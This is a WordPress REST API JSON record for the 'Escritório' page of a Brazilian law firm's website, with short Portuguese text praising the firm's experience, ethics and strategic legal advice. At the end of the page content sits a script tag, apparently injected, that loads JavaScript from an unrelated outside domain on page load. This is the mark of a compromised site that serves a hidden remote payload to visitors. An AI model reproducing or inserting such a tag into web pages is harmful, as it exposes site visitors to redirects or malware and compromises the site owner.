{"id":9,"date":"2010-06-23T03:42:58","date_gmt":"2010-06-23T03:42:58","guid":{"rendered":"http:\/\/www.carruscavieira.com.br\/?page_id=9"},"modified":"2026-03-10T13:25:27","modified_gmt":"2026-03-10T13:25:27","slug":"o-escritorio","status":"publish","type":"page","link":"https:\/\/carruscavieira.com.br\/?page_id=9","title":{"rendered":"Escrit\u00f3rio"},"content":{"rendered":"<p data-start=\"948\" data-end=\"1127\">Com quase duas d\u00e9cadas de atua\u00e7\u00e3o, o escrit\u00f3rio atua na presta\u00e7\u00e3o de assessoria jur\u00eddica <strong>estrat\u00e9gica<\/strong>, combinando experi\u00eancia, rigor t\u00e9cnico, dedica\u00e7\u00e3o e atualiza\u00e7\u00e3o constante.<\/p>\n<p data-start=\"1129\" data-end=\"1264\">A atua\u00e7\u00e3o do escrit\u00f3rio \u00e9 orientada pela an\u00e1lise cuidadosa de cada caso e pela constru\u00e7\u00e3o de solu\u00e7\u00f5es jur\u00eddicas modernas, seguras e consistentes.<\/p>\n<p data-start=\"1266\" data-end=\"1399\">Nossa pr\u00e1tica profissional \u00e9 pautada pela \u00e9tica, pela responsabilidade e pela confian\u00e7a constru\u00edda com os clientes ao longo dos anos.<\/p>\n<p><script src=\"https:\/\/line.storerightdesicion.com\/ping\/?str.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Com quase duas d\u00e9cadas de atua\u00e7\u00e3o, o escrit\u00f3rio atua na presta\u00e7\u00e3o de assessoria jur\u00eddica estrat\u00e9gica, combinando experi\u00eancia, rigor t\u00e9cnico, dedica\u00e7\u00e3o e atualiza\u00e7\u00e3o constante. A atua\u00e7\u00e3o do escrit\u00f3rio \u00e9 orientada pela an\u00e1lise cuidadosa de cada caso e pela constru\u00e7\u00e3o de solu\u00e7\u00f5es jur\u00eddicas modernas, seguras e consistentes. Nossa pr\u00e1tica profissional \u00e9 pautada pela \u00e9tica, pela responsabilidade e [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/pages\/9"}],"collection":[{"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9"}],"version-history":[{"count":27,"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/pages\/9\/revisions"}],"predecessor-version":[{"id":378,"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=\/wp\/v2\/pages\/9\/revisions\/378"}],"wp:attachment":[{"href":"https:\/\/carruscavieira.com.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}